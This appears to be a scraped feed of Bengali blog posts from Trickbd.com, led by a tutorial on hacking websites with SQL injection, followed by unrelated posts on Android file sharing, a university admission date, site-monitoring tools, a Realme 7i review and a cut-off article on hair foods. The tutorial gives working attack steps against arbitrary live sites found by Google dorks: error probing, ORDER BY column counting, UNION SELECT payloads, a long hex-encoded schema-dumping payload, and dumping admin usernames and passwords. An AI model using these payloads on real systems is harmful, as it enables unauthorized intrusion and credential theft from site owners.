Search box..

কিভাবে একটি ওয়েবসাইট হ্যাক করে, লিখা পরিবর্তন করে নিজের মত লেখা বসাবেন (with SQL injection)

কিভাবে একটি ওয়েবসাইট হ্যাক করে, লিখা পরিবর্তন করে নিজের মত লেখা বসাবেন (with SQL injection)


কিভাবে একটি ওয়েবসাইট হ্যাক করে, লিখা পরিবর্তন করে নিজের মত লেখা বসাবেন (with SQL injection)

Posted:

আচ্ছালামুআলাইকু🙂 আশা করি আপনারা সকলেই ভালো এবং সুস্থ আছেন। ❤
আজকের পোস্টটা যে বিষয় নিয়ে সেটি হচ্ছে SQLI বা SQL Injection. যদিও আমি SQL injection এ এক্সপার্ট না।😐 তাই কোথাও ভুল হলে ক্ষমার দৃষ্টিতে দেখবেন এবং আমাদের ফেসবুক এর প্রতিষ্ঠাতা মার্ক জাকারবার্গ কমেন্ট বক্স নামে একটা জিনিস তৈরি করে দিয়েছেন ঐখানে সুন্দর করে ভুলটা ধরিয়ে দিবেন।😗 সবাই শেষ পর্যন্ত পড়ার চেষ্টা করবো ইনশাল্লাহ্। যাই হোক কথা না বাড়িয়ে শুরু করা যাক।
শুরুতেই বলে নেই দয়া করে এটি কেউ খারাপ কাজে ব্যাবহার করবেন না শুধু আপনাদের শেখা এবং জানার উদ্দেশ্যে

প্রথমেই হয়তো আপনাদের মনে প্রশ্ন জাগতে পারে যে SQL কী?🤔
SQL এর পূর্ণরূপ হচ্ছে Structured Query language. SQL একটি শক্তিশালী ডাটা Mainipulation ও Definition ল্যাংগুয়েজ। যেহেতু এটি SQL নিয়ে পোস্ট না SQL injection নিয়ে তাই শুধু এইটুকু মাথায় রাখুন যে ওয়েবসাইট এর তথ্য ডাটাবেসে জমা করা বা তাকে পরিবর্তন বা নতুন তথ্য যোগ করার জন্য যে ভাষা ব্যাবহার করা হয় সেটি হচ্ছে SQL। উদাহরণ হিসেবে ধরুন আপনার স্কুলে 100 জন শিক্ষার্থী আছে এবং তাদের তথ্য যেমন নাম রোল ইত্যাদি স্কুল এর website এর ডাটাবেসে সংরক্ষণ করা আছে এবং ইচ্ছা করলে নতুন শিক্ষার্থীর তথ্য যোগ করতে পারছেন এবং তথ্য মুছে ফেলা বা পরিবর্তন করতে পারছেন।
যাইহোক এখন আসি মূল বিষয়ে…. SQL injection হলো এমন একটি মেথড যার মাধ্যমে আমরা কোনো ওয়েবসাইটের SQL এর vulnerability বা দুর্বলতাকে কাজে লাগিয়ে ওয়েবসাইটের ডাটাবেজ এর সকল তথ্য হাতিয়ে নিতে পারি অর্থাৎ হ্যাক করতে পারি। বড় কথা হচ্ছে ডাটাবেস থেকে আমরা এডমিন প্যানেল বা ওয়েবসাইটের কন্ট্রোল প্যানেল(cpanel) এর পাসওয়ার্ড বের করে এডমিন প্যানেলে লগইন করে পুরো ওয়েবসাইট হ্যাক করতে পারবো তাহলে ভাবুন SQL injection কতটা মারাত্মক হতে পারে। শুরুতেই বলেছি দয়া করে কেউ খারাপ কাজে এটি ব্যাবহার করবেন না শুধু মাত্র আপনাদের শেখা এবং জানার জন্য।
এখন কথা হচ্ছে যে কিভাবে বুঝবো যে এই ওয়েবসাইটটি SQL vulnerable কিনা🤔 হ্যাঁ অবশ্যই সেটা পরীক্ষা করার একটা পদ্ধতি আছে। তার জন্য আপনি google dorks এর সাহায্য নিতে পারেন। google dork কী সেটা নিয়ে ইনশাল্লাহ ভবিষ্যতে পোস্ট করার চেষ্টা করবো। google dork আসলে ব্যাবহৃত হয় কোনো কিছু নিখুঁতভাবে অনুসন্ধানের জন্য মনে যা সার্চ করবেন ওই বিষয় ছাড়া অন্য কোনো তথ্য অযথা আপনাকে দেখাবেনা। এখন আপনি গুগলে গিয়ে সার্চ করবেন inurl:index.php?id=fr (fr এর জায়গায় আপনি যে দেশের ওয়েবসাইট খুঁজতে চান সেই দেশের নাম দিতে হবে আমি এইখানে fr দিয়েছি মানে france একইভাবে in ,bd ,pk)। বা আপনি যদি চান কোনো দেশ টার্গেট করবেন না randomly যাতে বের হয় তাহলে id= ফাঁকা রাখবেন। এখন বলতে পারেন যে ভাইয়া দেশের নাম দিয়ে খুঁজতে পারবো বুঝলাম কিন্তু নির্দিষ্ট কোনো ওয়েবসাইট কিভাবে খুঁজব☹। হ্যাঁ সেটিও আপনি google dork দিয়ে খুঁজতে পারেন(site:target-website.com inurl:php?id=) অথবা ওই ওয়েবসাইটটিতে ঢুকে php?id=(যেকোনো সংখ্যা হতে পারে) এইরকম আছে এমন কোনো পেইজ খুঁজুন। যেহেতু আমরা এখন টার্গেট ওয়েবসাইটে করতেছিনা সেহেতু google এ সার্চ দিলাম inurl:index.php?id=fr এরপর প্রাপ্ত ফলাফল থেকে যেকোনো একটা ওয়েবসাইটে ঢুকবো। কিন্তু মনে রাখবেন google dork দিয়ে বের করার পর সবগুলা ওয়েবসাইটই যে vulnerable হবে সেটা না। আপনাকে চেক করে দেখতে হবে । তার জন্য ওয়েবসাইটের php?id=2(যেকোনো সংখ্যা থাকতে পারে) এর পর ‘ এই চিহ্নটি দিবো। এইটা ছাড়াও আরও কিছু সিনট্যাক্স আছে যেগুলো দ্বারা vulnerability পরীক্ষা করা যায় যেমন: \/,;’ ইত্যাদি। মনে করি আমাদের ফলাফল প্রাপ্ত ওয়েবসাইটটি http://example.com/page.php?id=5 প্রথমে ওয়েবসাইটে ঢুকে সবকিছু ভালোভাবে একবার দেখে নিবেন যাতে কোনোকিছু উধাও হয়ে গেলে বুঝতে পারেন। এরপর ‘ চিহ্নটি দেওয়ার পর url টি নিম্নরূপ হবে
http://example।.com/page.php?id=5’
‘ চিহ্নটি দিয়ে এন্টার চাপার পর যদি ওয়েবসাইটে কোনো error আসে বা কোনো ছবি অথবা কোনো লেখা উধাও হয়ে যায় তাহলে বুঝতে হবে যে ওয়েবসাইটটি SQL vulnerable বেশিরভাগ error এইরকম হয়ে থাকে
[1]
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

or

[2]
(Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\Inetpub\vhosts\jayapriya.com\httpdocs\gallery.php on line 11)
আমার নেওয়া ওয়েবসাইটটিতে কিছু লেখা উধাও হয়ে যায় এবং একটি এরোর ও দেখায়। এখন একটু খেয়াল করুন আসলে কেনো ওই চিহ্ন দেওয়ার কারণে error টা আসলো😗😗?? আসলে ‘ ) / ; এইগুলা হলো SQL ভাষার সিনট্যাক্স। এগুলো দেওয়ার কারণে ওয়েবসাইটে কোনো পরিবর্তন হওয়ার মানে আমাদের দেওয়া চিহ্নটি ওয়েবসাইটে এক্সিকিউট হয়েছে যার কারণে নতুন একটি এররের তৈরি হয়েছে। যাইহোক বুঝতে পারলাম যে ওয়েবসাইটটি SQL vulnerable যেহেতু আমাদের দেওয়া SQL এর যেকোনো কোড ওয়েবসাইটটি এক্সিকিউট করতেছে সেহেতু আমরা চাইলে SQL এর বিভিন্ন কীওয়ার্ড ব্যাবহার করে ডাটাবেস থেকে সকল ডাটা বের করে আনতে পারবো। এরপর ‘ চিহ্নটি কেটে id=5 এর পর 2টা হাইপেন ( – )দিবেন(http://example।.com/page.php?id=5–) এরপর এন্টার চাপার পর যদি
উক্ত error টি চলে যায় অর্থাৎ সাইটটি আগের মত হয়ে যায় তাহলে বুঝতে হবে এটিতে union based SQL injection করতে হবে। আর যদি না যায় তাহলে 5 এর পর ‘–+- দিবেন(http://example।.com/page.php?id=5’–+-) এখন যদি error টি চলে যায় তাহলে বুঝতে হবে যে string based sql injection করতে হবে
এরপরের ধাপে আগানোর জন্য আমাদের একটি অ্যাপ্লিকেশন প্রয়োজন( অ্যাপ্লিকেশন ছাড়াও করতে পারবেন কিন্তু অ্যাপ ব্যাবহার করলে সহজ হবে এবং তাড়াতাড়ি করতে পারবেন)। যারা মোবাইল ব্যাবহার করেন তারা anon hackbar নাম এর অ্যাপটি ডউনলোড করে ইনস্টল করে নিবেন(গুগলে anon hackbar লিখে সার্চ দিলেই পেয়ে যাবেন, না পারলে কমেন্টে জানাবেন)। আর যারা পিসি বা ল্যাপটপ ব্যাবহার করেন তারা cyber fox browser এবং anonfiles.com/1914wcD2p1/K.C.H-HackBarpro_xpi ফাইলটি ডাউনলোড করে ইনস্টল করে নিবেন তারপর ডান পাশে উপরে 3 ডটে ক্লিক করে add-ons এ যাবেন। তারপর extension এ গিয়ে দেখবেন সেটিংস এর মত আইকন আছে ঐখানে ক্লিক করার পর দেখতে প্যানেল insall from file এইরকম একটা অপশন আছে ঐটায় ক্লিক করবেন। তারপর এই ফাইল টি (K.C.H-HackBarpro_xpi) সিলেক্ট করবেন তারপর ইনস্টল এ ক্লিক করবেন। তারপর cyber fox কেটে দিয়ে আবার ঢুকবেন দেখবেন উপরে hackbar চলে এসেছে। যদি না দেখায় উপরে তাহলে f 9 বাটন চাপবেন। এরপর anon hackbar এর ইনপুট বক্সে ওই ওয়েবসাইটটি দিবেন (http://example।.com/page.php?id=5) এরপর যদি union based থাকে তাহলে নিচে থেকে union based সিলেক্ট করবেন এরপর order by অথবা group by এ ক্লিক করবেন। আর যদি string based থাকে একইভাবে string based select করবেন। তারপর একটি ইনপুট বক্স আসবে সেইখানে column number দিতে বলবে। কিন্তু আমরা তো আর জানিনা যে ওয়েবসাইটটিতে কয়টা কলাম আছে তাইনা। তাহলে কিভাবে জানবো? তার জন্য আপনি প্রথমে group বা অর্ডার by 100 লিখবেন এবং exicute বাটনটিতে চাপবেন। কোনো ওয়েবসাইটেই এত বেশি কলাম থাকে না তাই আপনাকে একটা এরর দেখাবে বা আবার কোনো ইমেজ বা লেখা উধাও হয়ে যাবে। এরপর ধীরে ধীরে কমিয়ে কমিয়ে বার বার order by বা group by করতে থাকবেন। যত দেওয়ার পর আর এররটি আসবে না বুঝতে হবে ততগুলো কলাম ওয়েবসাইটটিতে বিদ্যমান যেমন প্রথমে দিলেন
union based এর জন্য: http://example।.com/page.php?id=5+ORDER+BY+100–
string based এর জন্য: http://example।.com/page.php?id=5’ORDER+BY+100–+-
পরবর্তীতে আবার দিলেন 100 এর জায়গায় 50 তারপর 20 এরপর 20 এ যদি ইররটি চলে যায় আবার কিছু বাড়িয়ে দেখবেন যে সর্বোচ্চ কত পর্যন্ত এরর বিহীন থাকে যেমন ধরেন 20 পর্যন্ত আসার পর এরোরটি চলে গেছে তাহলে 21…22 এইভাবে বাড়িয়ে দেখবেন। ধরি যে 22 দেওয়ার পরই আবার error টি দেখাচ্ছে। তার মানে আমরা বুঝলাম যে 21 টি কলাম আছে।

আর যারা পিসি তে করবেন তারা anon hackbar এ 2 টা অপশন পাবেন না শুধু union based paben তাই তারা এই কোডটি কপি করে করবেন এবং পেস্ট করে exicute এ ক্লিক করবেন
union based: +ORDER+BY+1–
অথবা +GROUP+BY+1–
string based: ‘ORDER+BY+100–+-
‘GROUP+BY+100–+-

example:
union:
http://example।.com/page.php?id=5+ORDER+BY+100–
string:http://example।.com/page.php?id=5’ORDER+BY+100–+-

এখন আমরা জানতে পারলাম যে ওয়েবসাইটটিতে 21 টি কলাম আছে। এরপর আগের দেওয়া কোড টুকু কেটে দিবেন মানে শুধু http://example।.com/page.php?id=5 এইটুকু রাখবেন। তারপর আবার union based বা string based আগে যেইটা সিলেক্ট করেছিলেন ঐটাই আবার সিলেক্ট করে তারপর union select অপশনটিতে ক্লিক করবেন। তারপর ঐখানে প্রাপ্ত কলাম নম্বরটি লিখবেন। যেহেতু আমরা এইখানে 21 পেয়েছি সেহেতু 21 লিখবো।
example: http://example।.com/page.php?id=5+AND+0+UNION+SELECT+1,2,3,4,…..21–
আর পিসি ইউজার যারা তারা union based option এ ক্লিক করে ইউনিয়ন সিলেক্ট থেকে সিলেক্ট করতে পারেন অথবা নিচের কোড কপি করে করতে পারেন
union based: +AND+0+UNION+SELECT+1,2,3,4(যে কয়টা কলাম থাকবে তত পর্যন্ত)–
string based: ‘AND+0+UNION+SELECT+1,2,3,4–+-
example: http://example।.com/page.php?id=5+AND+0+UNION+SELECT+1,2,3,4–
এরপর এইটা দেওয়ার পর আবার এক্সিকিউট এ ক্লিক করবেন। এখন একটু মজার বিষয় খেয়াল করুন। দেখতে পারবেন ওয়েবসাইটে কোনো জায়গায় এক বা একাধিক সংখ্যা দেখা যাচ্ছে যেইটা আপনার দেওয়া কলাম নম্বর গুলোর মধ্যে আছে। যেমন আপনার কলাম সংখ্যা ধরুন 5 টি তাহলে 5 এর ভিতরেই এক বা একাধিক সংখ্যা লক্ষ করবেন। এখন প্রশ্ন জাগতে পারে যে এই সংখ্যাটি কেনো আসলো এর দ্বারা আমাদের লাভই বা কি। যেই সংখ্যা গুলো দেখাবে তত নম্বর column গুলো আসলে vulnerable বা ওই কলাম গুলোর মধ্যে দুর্বলতা আছে। এখন আমরা যে কলাম গুলো দেখাবে তার যেকোনো একটি কেটে দিয়ে ওই জায়গায় যেকোনো SQL এর কোয়েরি এক্সিকিউট করতে পারবো যেমন SQL এর version জানতে পারবো। টেবিল এবং কলাম গুলো দেখতে পারবো এবং সেগুলো ডাম্প করে ডাটাবেস থেকে সবকিছু নিয়ে আসতে পারবো। ধরি আমাদের ওয়েবসাইটটিতে 2 এবং 3 এই 2টি সংখ্যা দেখাচ্ছে তার মানে এই 2টি কলামে দুর্বলতা আছে। এখন আমরা যদি জানতে চাই যে SQL টি ওয়েবসাইটটিতে ব্যাবহার করা হয়েছে তার ভার্সন কত তাহলে নিচের মত করে লিখতে হবে।
+AND+0+UNION+SELECT+1,version(),3,4– [যেহেতু আমরা 2 এবং 3 vulnerable পেয়েছিলাম তাই 2 এর জায়গায় version likhesi]
এখন যদি ডাটাবেস এর নাম জানতে চান তাহলে version() এর পরিবর্তে লিখতে হবে database()
example:http://example।.com/page.php?id=5+AND+0+UNION+SELECT+1,database(),3,4–
অথবা আপনি চাইলে dios(dump in one shot) ব্যাবহার করে টেবিল এবং কলাম গুলোর নাম একবারে বের করে ফেলতে পারেন সেক্ষেত্রে আপনাকে union/string অপশনটিতে ক্লিক করে নিচের দিকে দেখতে পাবেন অনেকগুলো dios দেওয়া আছে ওইগুলো ঐখানে দিতে পারবেন।

আমি উদাহরণ হিসেবে আমার dios দিয়ে দেখাচ্ছি
http://example।.com/page.php?id=5+AND+0+UNION+SELECT+1,GROUP_CONCAT(0x3c646976207374796c653d226261636b67726f756e642d696d6167653a75726c282768747470733a2f2f77616c6c70617065726163636573732e636f6d2f66756c6c2f323334353234342e6a706727293b206261636b67726f756e642d7265706561743a206e6f2d7265706561743b6261636b67726f756e642d73697a653a636f7665723b20636f6c6f723a233366303b20666f6e742d73697a653a20313470783b20666f6e742d7765696768743a3730303b2070616464696e673a32307078203570783b20223e,0x3c6831207374796c653d22636f6c6f723a626c75653b20666f6e742d73697a653a32357078223e496e6a6563746564204279203c6920207374796c653d22636f6c6f723a726564223e78526f6f7430303c2f693e3c2f68313e,0x3c62207374796c653d22636f6c6f723a233941464635433b20666f6e742d7374796c653a6974616c69633b20666f6e742d73697a653a31357078223e,0x4461746162617365204e616d653a20,database(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x557365723a20,user(),0x3c62723e,0x436f756e743a20,(SELECT+CONCAT(COUNT(schema_name),0x202f20446174616261736573)+FROM+INFORMATION_SCHEMA.SCHEMATA),0x3c62723e,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),0x3c2f623e,0x3c62723e,(select(@a)from(select(@a:=0x00),0x3c62723e,0x3c7370616e207374796c653d22666f6e742d7765696768743a363030223e,(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a),0x3c2f7370616e3e,0x3c2f6469763e),3,4–

সবসময় যে একই dios কাজ করবে এমন না। সেক্ষেত্রে একটা একটা করে দিয়ে দেখবেন। এরপর আপনি ডাটা ডাম্প করার জন্য union/string এ ক্লিক করার পর dump data অপশনটিতে ক্লিক করার পর যে table এর যে কলাম গুলোর ডাটা ডাম্প করতে চান বা ডাটা দেখতে চান তার নাম লিখবেন ইনপুট বক্সে। পিসির ক্ষেত্রে ডাটা নামে একটা অপশন পাবেন union এর ভিতর ঐটাই ক্লিক করে data group concat অপশনটিতে ক্লিক করবেন।
যেমন আমার প্রাপ্ত ডেটাবেসে একটি admin নামে টেবিল আছে এবং তার ভিতরে থাকা username এবং password নামে 2টি column আছে সেটি ডাম্প করতে চাই। তাহলে টেবিল নামে এর জায়গায় admin এবং column er জায়গায় username, password দিয়ে এক্সিকিউট এ ক্লিক করবো এবং এডমিন প্যানেলের username এবং password দেখাবে

এভাবে আপনারা SQL injection করে SQL vulnerable ওয়েবসাইট হ্যাক করতে পারবেন। আজ এই পর্যন্তই কষ্ট করে পুরোটা পড়ার জন্য ধন্যবাদ😗

Credit And Author Copyright: Shahedul Islam (এই পোস্টটির Author তার ক্ষমতা বলে পোস্টি রিমুভ বা ডিলিট করার ক্ষমতা রাখে)
Tsports দেখতে এখানে ভিজিট করুন

The post কিভাবে একটি ওয়েবসাইট হ্যাক করে, লিখা পরিবর্তন করে নিজের মত লেখা বসাবেন (with SQL injection) appeared first on Trickbd.com.

কোনপ্রকার বাড়তি এপ ছাড়াই SHAREit এর মতো যেকোন ফাইল দ্রুত শেয়ার করুন !

Posted:

গুগল প্লেস্টোরের মাধ্যমে এপ শেয়ার করার ট্রিক শেয়ার করার পর আপনার অনেকেই জানতে চেয়েছিলেন যে কোন বাড়তি এপ ছাড়াই কি SHAREit এর মতো ফাস্ট অন্যান্য ফাইল শেয়ার করা যায় কিনা । তো আজকে আমি আপনাদের সাথে সেই ট্রিকটাই শেয়ার করতে যাচ্ছি ।

ফাইল শেয়ারিং এর জন্য গুগলের অন্যতম একটা ফিচার হলো Nearby Share । এটা অলরেডি আমাদের সবার মোবাইলেই আছে  ।

 

কিভাবে Nearby Share দিয়ে যেকোন ফাইল শেয়ার করবেন?

(কোথাও বুঝতে অসুবিধা হলে নিচ থেকে ভিডিও দেখতে পারেন )

 

এই ফিচারটা ইউজ করতে হলে আপনার মোবাইলের Android Version 6.0 বা তার থেকে বেশি হতে হবে ।

তো প্রথমেই আপনাকে Settings > Google অপশনে যেতে হবে

image

তারপর Google Settings থেকে Device Connections

image

তারপর, Nearby Share

image

তারপর Nearby Share অন করে নিবেন
image

তারপর আপনি যেসব ফাইল পাঠাতে চান ঐগুলো সিলেক্ট করে জাস্ট শেয়ার বাটনে ক্লিক করবেন, ফাইল ম্যানেজার বা যেকোন জায়গা থেকে সেম প্রসেসে শেয়ার করতে পারবেন ।

image

তারপর Nearby Share সিলেক্ট করতে পারবেন ।

image

 

তবে যার সাথে শেয়ার করবেন তাকেও সেটিংস থেকে Nearby Share চালু করে নিতে হবে । তাহলে শেয়ার করার সময় তার নাম/লগো দেখবেন, ঐটায় ক্লিক করলে তার কাছে নোটিফিকেশন যাবে এবং সে ইজিলি রিসিভ করতে পারবে ।

image

আর প্লেস্টোর দিয়ে এপস এবং গেমস শেয়ার করতে চাইলে আমার আগের পোস্টটি দেখতে পারেন=> https://trickbd.com/android-tips/706589

 

প্র্যাকটিক্যালি দেখতে চাইলে নিচের ভিডিওটা দেখতে পারেনঃ ( Nearby Share + Google PlayStore App Sharing System)

 

★★আমার আগের পোষ্ট যারা মিস করেছেন তারা নিচের লিংক থেকে দেখে নিনঃ

★★ফেসবুক পেইজের ভিডিওতে ইউটিউবের মতো Thumbnail দিন কয়েক সেকেন্ডেই! | ফেসবুকের ভিডিওতে ছবি সেট করুন

★★আজীবনের জন্য নেটফ্লিক্স প্রিমিয়ামের বিকল্প এপ একদম ফ্রীতে নিয়ে নিন | Android iOS এবং Windows সব প্লাটফর্মের জন্য

★★নিয়ে নিন মোবাইল দিয়ে অডিও,ভিডিও ডাউনলোড করার জন্য সবচেয়ে জনপ্রিয় এবং সেরা Videoder এপের প্রিমিয়াম ভার্সন! 😱

★★আপনার কম্পিউটারের নরমাল কীবোর্ডে মেকানিক্যাল কীবোর্ডের সাউন্ড ব্যবহার করুন!

★★ নিয়ে নিন কম্পিউটারে Screen Record করার জন্য বেস্ট একটি এপ । সাথে স্ক্রিন রেকর্ড করার স্টেপ বাই স্টেপ গাইডলাইন! (For Windows Linux and Mac Users)

★★পাবজিতে গ্রেনেড স্কিন নিন কোনপ্রকার UC ছাড়াই । Get PUBG Grenade Skin For Free! 

 

 

 

The post কোনপ্রকার বাড়তি এপ ছাড়াই SHAREit এর মতো যেকোন ফাইল দ্রুত শেয়ার করুন ! appeared first on Trickbd.com.

জাতীয় বিশ্ববিদ্যালয় অনার্স প্রথম বর্ষ ভর্তির তারিখ প্রকাশিত

Posted:

আসসালামু আলাইকুম। আশা করি সবাই ভালো আছেন। আমি আলহামদুলিল্লাহ ভালো আছি। একটু ঠাণ্ডা লাগছে দোয়া করবেন সবাই।

এবার এইচএসসি পরীক্ষার্থীরা সবাই অপেক্ষা করছিলেন জাতীয় বিশ্ববিদ্যালয় ভর্তি কবে শুরু হবে। অনেক আমার সাইট বিকল্প বিদ্যালয়ে কমেন্ট করেছিলেন কবে শুরু হবে আরো অনেক প্রশ্ন। যাই হোক, গত ২৫/০২/২১ জাতীয় বিশ্ববিদ্যালয় একটি নোটিশে স্থগিত পরীক্ষার নতুন সময় সূচি সহ অনার্স প্রথম বর্ষ ভর্তি আবেদনের তারিখ উল্লেখ করেছে।

নোটিশে বলা হয়েছে জাতীয় বিশ্ববিদ্যালয় অনার্স ১ম বর্ষ ভর্তি আবেদন শুরু হবে ০৮/০৬/২১। জাতীয় বিশ্ববিদ্যালয় অনার্স ১ম বর্ষ ভর্তি পরীক্ষা হবে কিনা এ নিয়ে কোনো তথ্য প্রকাশ করে নি।

নোটিশটি নিচের লিংক হতে ডাউনলোড করে নিন
Download pdf

নিচের লিংক হতে ভর্তির বিস্তারিত তথ্য দেখে নিন
জাতীয় বিশ্ববিদ্যালয় অনার্স ১ম বর্ষ ভর্তি বিজ্ঞপ্তি ২০২০-২১

আমার ট্রিকবিডিতে আরো পোস্টঃ
এবার HSC প্রস্তুতি নিন টেন মিনিট স্কুলের সাথে

৯০% ছাড়ে টেন মিনিট স্কুলের ৯,৫০০ টাকার SSC Crush Course করুন মাত্র ৯,৫০ টাকায়

হ্যাকস বান্ডলঃ একটির দামে ৩টি বই!

The post জাতীয় বিশ্ববিদ্যালয় অনার্স প্রথম বর্ষ ভর্তির তারিখ প্রকাশিত appeared first on Trickbd.com.

5 Free Tools যা দিয়ে Website Changes Monitor করতে পারবেন

Posted:

Benefits of 24/7 Website Monitoring Services - WPCruiseControl - WordPress  Fixes, Updates & Securityবর্তমানে প্রতিনিয়ত সকল Website Update হচ্ছে। আপনি কেন বসে থাকবেন? আপনার website এ কখন কী Change করবেন তার সব কিছুই Monitoring করুন নিচের Free Tools গুলো দিয়ে-

5টি Web Application Share করলাম, যা দিয়ে Website Changes Monitor করতে পারবেন

01. https://visualping.io/

02. https://versionista.com/

 

03. https://pagecrawl.io/

 

04. https://distill.io/

 

05. https://fluxguard.com/

 

এইছিলো কিছু Free Tools, আশা করি আপনার Website এ নিত্য-নতুন ভাব ফুটিয়ে তুলে এটি উপকারে আসবে।

Mail me
dex477604@gmail.com

The post 5 Free Tools যা দিয়ে Website Changes Monitor করতে পারবেন appeared first on Trickbd.com.

দুর্দান্ত ক‍্যামেরা, 8GB RAM এবং 5000 এমএএইচ শক্তিশালী ব‍্যাটারীর অসাধারণ ফোন Realme 7i

Posted:

আসসালামু আলাইকুম সবাই কেমন আছেন…..? আশা করি সবাই ভালো আছেন । আমি আল্লাহর রহমতে ভালোই আছি ।আসলে কেউ ভালো না থাকলে TrickBD তে ভিজিট করেনা ।তাই আপনাকে TrickBD তে আসার জন্য ধন্যবাদ ।ভালো কিছু জানতে সবাই TrickBD এর সাথেই থাকুন ।

Realme 7i

মোবাইল তো আমরা সবাই ব্যবহার করি। কেউ কমদামী আর বেশি দামী। বর্তমানে প্রতিদিন নতুন নতুন ফিউচার যুক্ত মোবাইল রিলিজ হচ্ছে। আর তার সাথে মোবাইলের দাম আগের তুলনায় অনেক কমছে।Android Operating System দ্বারা তৈরিকৃত মোবাইল সংখ্যা এবং কোম্পানি দিন দিন বৃদ্ধি পাচ্ছে।

আজকে Android Operating System দ্বারা তৈরিকৃত এমনি একটি বড় কোম্পানির মোবাইল ফোনের রিভিউ দিতে যাচ্ছি। Realme 7i ফোনটিতে ৬.৫ ইঞ্চি ডিসপ্লে ব্যবহার করা হয়েছে। ফোনটির পিছনে চারটি ক্যামেরা এগুলো রেজুলেশন হচ্ছে 64+8+2+2 Megapixel। সামনে একটি ক্যামেরা রয়েছে সেটার রেজুলেশন হচ্ছে 16 Megapixel। Realme 7i ফোনটিতে ব্যাটারি রয়েছে লিথিয়াম-পলিমার 5000 এমএএইচ (Non-removable) এবং 18W Fast Charging। চলুন দেখে আসা যাক এই মোবাইলটির স্পেসিফিকেশন।

ফোনের নামঃRealme 7i

প্রথম রিলিজঃ ১৭ সেপ্টেম্বর ২০২০

ফোনের কালারঃAurora Green, Polar Blue

ডিসপ্লেঃRealme 7i এর ডিসপ্লের সাইজ ৬.৫ ইঞ্চি। রেজুলেশন রয়েছে HD+ 720 x 1600 pixels (270 ppi) এবং IPS LCD Touchscreen রয়েছে।

পিছনের ক্যামেরাঃ Realme 7i ফোনের পিছনের ক্যামেরার মধ্যে রয়েছে Quad 64+8+2+2 Megapixel ক্যামেরার মধ্যে যে ফিউচার গুলো রয়েছে PDAF, ultrawide, macro, LED flash, depth, HDR & more এবং ভিডিও রেকর্ডিং Full HD (1080p), gyro-EIS হবে।

সামনের ক্যামেরাঃRealme 7i সামনের ক্যামেরা রেজুলেশন রয়েছে 16 Megapixel ক্যামেরা মধ্যে যে ফিউচার গুলো রয়েছে HDR, f/2.1, 1/3″, 1.0µm & more ভিডিও রেকর্ডিং Full HD (1080p), gyro-EIS হবে।

ব্যাটারিঃ Realme 7i এর ব্যাটারি রয়েছে লিথিয়াম-পলিমার 5000 এমএএইচ (Non-removable) এবং 18W Fast Charging

Performance: Realme 7i এর Operating System রয়েছে Android 10 (Realme UI)। চিপসেট রয়েছে Qualcomm Snapdragon 662 (11 nm)। প্রসেসর রয়েছে Octa core, up to 2.0 GHz

স্টোরেজঃ Realme 7i ফোনের RAM রয়েছে 8GB এবং ROM রয়েছে 128 GB (UFS 2.1)

সিকিউরিটিঃ Realme 7i ফোনের পিছনে Fingerprint রয়েছে এবং Face Unlock রয়েছে।

দামঃRealme 7i মোবাইলটির বাংলাদেশী মূল্য হবে ১৭,৯৯০ টাকা ।

Highlight


আশা করি সবাই সবকিছু বুঝতে পেরেছেন। কোথাও সমস্যা হলে কমেন্ট করে জানাবেন অথবা ফেসবুকে জানাতে পারেন ফেসবুকে আমি

The post দুর্দান্ত ক‍্যামেরা, 8GB RAM এবং 5000 এমএএইচ শক্তিশালী ব‍্যাটারীর অসাধারণ ফোন Realme 7i appeared first on Trickbd.com.

চুলের জন্য অত্যান্ত গুরুত্বপূর্ণ পাঁচটি খাবার সম্পর্কে জেনে নিন।

Posted:

আসসালামুআলাইকুম।
ও হিন্দু ভাইদের জানাই আদাব।কেমন আছেন সবাই? আশা করি ভাল আছেন সবাই।কারন এই ট্রিকবিডির সাথে থাকলে সম সময় ভাল থাকা যায়।
নিত্যনতুন ট্রিক ও টিপস সম্পর্কে জানা যায় ও ধারনা পাওয়া যায়।
আজকে কোন বিষয় নিয়ে পোস্ট করতে যাচ্ছি আশা করি আপনারা টাইটেল দেখে বুঝে গেছেন।
চুলের জন্য গুরুত্বপূর্ণ পাঁচটি খাবার নিয়ে আলোচনা করব আজ।
আমাদের মধ্য অনেকের চুল পড়া, চুল ভাঙ্গা,ও আরো চুলের বিভিন্ন সমস্যা আছে।

আসলে আমাদের চুলের জন্য কি আমরা একবার ভাবি?
যে কি কোন খাবার খেলে চুল ঝড়বে না ও চুল ভাল থাকবে।
আমাদের দেহের জন্য যেমন আমরা বিভিন্ন খাবার খাই,পানি খাই।
ঠিক তেমনি চুলের জন্য উপকারী কিছু খাবার রয়েছে, যেগুলো খাইলে আপনার চুল ভাল থাকবে।
আমরা উপলব্ধি করতে পারি তখন,যখন আমাদের চুল ঝরে বা চুও চুল পড়ে।
তখন বিভিন্ন ধরনের পোডাক্ত ব্যাবহার করে,আরো চুলের সমস্যা বেড়ে যায়।
আগে থেকে সতর্ক হলে আর এ সমস্যায় পড়তে হত না।
তাই চুলের যত্নে এই খাবার গুলো আমাদের খাবার তালিকায় রাখা উচিৎ।
কথা না বাড়িয়ে শুরু করা যাকঃ

১] চুলের উজ্বলতা বাড়াতে ( গাজর)

গাজরে রয়েছে ভিটামিন এ।গাজর অত্যান্ত ভিটামিন রয়েছে।গাজর যেমন চোখ কে ভাল রাখে।তেমনি চুল এর জন্য ও অত্যান্ত উপকারি।
চুলের প্রাকৃতিক তেল এর ভারসাম্য বজায় রাখে।
ও চুলের স্বাথ ভাল রাখে।ফলে চুল পড়ে না,চুল ভাঙ্গে না ও চুল ভাল থাকে।
বিশেষজ্ঞ দের মতে, গাজর এ রয়েছে ভিটামিন এ,এটি চোখ ও চুলকে ভাল রাখতে অত্যান্ত সাহায্য করে।

২] চুলে খুকশি প্রতিরোধে ( আখরোট বাদাম)

চুলের জন্য অত্যান্ত গুরুত্বপূর্ণ হলো সেলেনিয়াম।
যা আখরোট বাদামে পাওয়া যায়,প্রচুর পরিমানে।
আখরোট বাদাম খেলে খুকশির ঝুকে কমে যায়।
